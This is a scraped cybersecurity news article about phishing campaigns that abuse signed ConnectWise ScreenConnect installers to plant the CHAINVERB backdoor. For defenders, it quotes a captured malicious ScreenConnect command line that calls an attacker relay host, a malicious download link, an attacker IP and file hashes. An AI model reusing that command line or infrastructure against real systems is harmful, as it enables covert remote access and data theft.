![How to Use AI as a Productivity Tool with Mike Kaput [MAICON 2025 Speaker Series]](https://www.marketingaiinstitute.com/hubfs/v2MAICON-Speaker_Series.png)
![[The AI Show Episode 152]: ChatGPT Connectors, AI-Human Relationships, New AI Job Data, OpenAI Court-Ordered to Keep ChatGPT Logs & WPP’s Large Marketing Model](https://www.marketingaiinstitute.com/hubfs/ep%20152%20cover.png)
.jpg?width=1920&height=1920&fit=bounds&quality=70&format=jpg&auto=webp#)
_designer491_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
![3DMark Launches Native Benchmark App for macOS [Video]](https://www.iclarified.com/images/news/97603/97603/97603-640.jpg)
![Craig Federighi: Putting macOS on iPad Would 'Lose What Makes iPad iPad' [Video]](https://www.iclarified.com/images/news/97606/97606/97606-640.jpg)
Hackers Continue to Leverage ConnectWise ScreenConnect Tool to Deploy Malware
Cybercriminals are intensifying their exploitation of ConnectWise ScreenConnect, a legitimate remote monitoring and management (RMM) tool, to deploy sophisticated malware campaigns targeting global financial organizations. This alarming trend represents a significant evolution in threat actor tactics, as attackers leverage digitally signed legitimate software to bypass traditional security controls and establish persistent remote access to compromised […] The post Hackers Continue to Leverage ConnectWise ScreenConnect Tool to Deploy Malware appeared first on Cyber Security News.
Cybercriminals are intensifying their exploitation of ConnectWise ScreenConnect, a legitimate remote monitoring and management (RMM) tool, to deploy sophisticated malware campaigns targeting global financial organizations.
This alarming trend represents a significant evolution in threat actor tactics, as attackers leverage digitally signed legitimate software to bypass traditional security controls and establish persistent remote access to compromised systems.
The latest wave of attacks employs invoice-themed phishing emails as the primary delivery mechanism, capitalizing on the ubiquity of financial communications in corporate environments.
These campaigns demonstrate remarkable sophistication, utilizing legitimate digital signatures from ConnectWise to evade detection while deploying the CHAINVERB backdoor, a specialized downloader that embeds command-and-control infrastructure within digital certificates to maintain stealth operations.
.webp)
CyberProof analysts identified a surge in malicious ScreenConnect droppers throughout May 2025, with particular focus on campaigns attributed to UNC5952, a financially motivated threat group known for conducting socially engineered financial transaction operations.
The researchers noted an alarming increase in the use of .top and dns.net top-level domains across multiple eCrime campaigns, indicating a coordinated shift in threat actor infrastructure preferences.
The discovery coincides with ConnectWise’s May 28, 2025 security advisory acknowledging a potential breach by a nation-state threat group, currently under investigation by Mandiant.
This development adds layers of complexity to the threat landscape, as organizations must now contend with both financially motivated cybercriminals and sophisticated state-sponsored actors exploiting the same legitimate tools for malicious purposes.
The widespread abuse of RMM tools continues to challenge traditional security paradigms, as these applications possess inherent remote access capabilities that, once compromised, provide attackers with extensive system control.
Organizations across sectors are grappling with the dual challenge of maintaining operational efficiency through legitimate remote access tools while preventing their exploitation by malicious actors.
Technical Infection Mechanism and Payload Delivery
The CHAINVERB malware demonstrates sophisticated evasion techniques through its unique approach to command-and-control communication.
Upon execution, the malware establishes connections using embedded URLs hidden within digital certificate structures, as evidenced by the captured command line: "ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.anondns.net&p=8041&s=d90196cb-dfc3-4979-ae46-cf52dc818d2a".
This technique allows the malware to leverage legitimate certificate infrastructure while maintaining covert communication channels with attacker-controlled servers.
.webp)
The infection chain begins with phishing emails containing malicious PDF attachments or direct download links, such as the observed case from sender “russ@oshlaw.com” directing victims to https://visionary-clafoutis-308e89.netlify.app/ to download “Document.exe”.
The downloaded executable, despite appearing as a legitimate Adobe Reader installer, carries a valid ConnectWise digital signature (MD5: a01a80d8c1f665eda5a81391a1ed0024), demonstrating the attackers’ ability to abuse legitimate code-signing certificates for malicious purposes.
Once installed, the malware initiates remote desktop sessions to attacker infrastructure, enabling comprehensive host reconnaissance and screenshot capture capabilities.
The observed connections to IP addresses such as 176.123.10.175 on uncommon port 8880 facilitate data exfiltration and persistent remote access, allowing threat actors to conduct extended reconnaissance operations within compromised environments.
Speed up and enrich threat investigations with Threat Intelligence Lookup! -> 50 trial search requests
The post Hackers Continue to Leverage ConnectWise ScreenConnect Tool to Deploy Malware appeared first on Cyber Security News.
